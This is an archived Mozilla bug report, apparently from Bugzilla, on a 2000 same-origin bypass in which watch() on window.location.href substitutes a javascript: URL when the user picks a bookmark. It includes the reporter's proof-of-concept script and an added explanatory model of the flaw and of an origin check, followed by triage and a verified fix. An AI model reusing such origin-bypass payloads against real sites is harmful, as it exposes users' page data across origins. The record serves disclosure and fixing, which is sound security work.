watch() and bookmarks vulnerability

VERIFIED FIXED in M16

Status: VERIFIED FIXED
Product: Core
Component: Security
Priority: P3
Severity: normal
Reported: 18 years ago
Last modified: 18 years ago

People: Reporter: Norris Boyd, Assigned: Norris Boyd

Tracking: Trunk, x86, Windows NT

Description (Assignee), 18 years ago
Subject: BUG: watch() and bookmarks vulnerability
Date: Fri, 18 Feb 2000 16:13:34 +0200
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

The watch() method, when applied to window.location.href, allows
circumventing the Same Origin security policy.
But user interaction is required: selecting any bookmark from the menu
of the target window.
The code is:
-------------------------------------------------
Select a bookmark from the menu of the other window.
<SCRIPT>
// Open the target origin in a named window; the attacker's page cannot read
// its document directly, because of the Same Origin policy.
a=window.open("http://www.yahoo.com","victim");
// Set a watchpoint on the victim's location.href. Whenever the victim
// navigates (here, when the user picks a bookmark), the handler runs and its
// return value is what actually gets assigned: a javascript: URL that
// executes in the victim window's origin and can read its document.
a.location.watch("href",function (id,oldval,newval) {
  return "javascript:alert('The first link is:' +document.links[0].href)";
});
</SCRIPT>
-------------------------------------------------


watch() vulnerability. 
Select a bookmark from the menu of the other window.
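The mechanism Guninski describes, modelled as an added example that is not code from the bug report or from Mozilla: a small stand-in for the legacy, non-standard watch() hook (handler return value becomes the stored value), the attacker's handler from the report, and a check that denies cross-origin watchpoints on a location object. The thread only says "Fix checked in", so the check illustrates the principle (the installer of a watchpoint on location must share the target's origin) rather than Mozilla's actual fix. makeLocation, installWatch, installWatchChecked and the bookmark URL are invented for this example; the location model records the URL that would be loaded instead of navigating.

```javascript
// Model of a window.location. Setting href would navigate the window; here we
// only record what URL would have loaded, in this window's origin. (Invented.)
function makeLocation(origin) {
  const loc = { origin, navigated: [] };
  let href = origin + "/";
  Object.defineProperty(loc, "href", {
    configurable: true,
    enumerable: true,
    get() { return href; },
    set(v) { href = v; loc.navigated.push(v); }
  });
  return loc;
}

// Stand-in for legacy SpiderMonkey watch(): handler(prop, oldval, newval) runs
// on every assignment and its return value is what gets stored. (Invented.)
function installWatch(obj, prop, handler) {
  const desc = Object.getOwnPropertyDescriptor(obj, prop);
  Object.defineProperty(obj, prop, {
    configurable: true,
    enumerable: true,
    get() { return desc.get.call(obj); },
    set(newval) {
      const oldval = desc.get.call(obj);
      desc.set.call(obj, handler(prop, oldval, newval));
    }
  });
}

// The report's attack: the handler ignores the URL the user chose and
// substitutes a javascript: URL, which the victim window then "navigates" to,
// so the script runs with the victim's origin and can read document.links.
function demoVulnerable() {
  const victim = makeLocation("http://www.yahoo.com");
  const attackerHandler = (id, oldval, newval) =>
    "javascript:alert('The first link is:' + document.links[0].href)";
  installWatch(victim, "href", attackerHandler);
  victim.href = "http://bookmarked.example/"; // user picks a bookmark (constructed URL)
  return victim.navigated[victim.navigated.length - 1];
}

// Illustrative check, not Mozilla's fix: a watchpoint on a location object is
// only installable from the same origin as that location.
function installWatchChecked(obj, prop, handler, callerOrigin) {
  if (callerOrigin !== obj.origin) {
    throw new Error("cross-origin watch() on location denied");
  }
  installWatch(obj, prop, handler);
}

// With the check, the cross-origin handler is never installed and the
// bookmark navigation goes where the user intended.
function demoHardened() {
  const victim = makeLocation("http://www.yahoo.com");
  try {
    installWatchChecked(victim, "href", () => "javascript:alert(1)",
                        "http://attacker.example"); // hypothetical attacker origin
  } catch (e) {
    // denied: the victim's href setter stays untouched
  }
  victim.href = "http://bookmarked.example/";
  return victim.navigated[victim.navigated.length - 1];
}
```

demoVulnerable() shows the watchpoint turning an innocuous bookmark navigation into a javascript: URL executed in the victim's origin; demoHardened() shows the same user action landing on the bookmark once the cross-origin installer is refused. A same-origin caller can still use installWatchChecked normally.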
Updated (Assignee), 18 years ago
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1, 18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Updated (Assignee), 18 years ago
Keywords: beta2

Comment 2, 18 years ago
Moving to M16 so that M15 can branch.
Target Milestone: M15 → M16
Comment 3 (Assignee), 18 years ago
Add test case.
Comment 4 (Assignee), 18 years ago
Fix checked in.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 5, 18 years ago
Norris - what is the expected behavior? What I see with Seamonkey is that when 
selecting a bookmark in the second window, nothing happens. With Nova, the 
bookmark selected is opened in the new window.

Updated, 18 years ago
Keywords: nsbeta2

Comment 6, 18 years ago
Verified.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?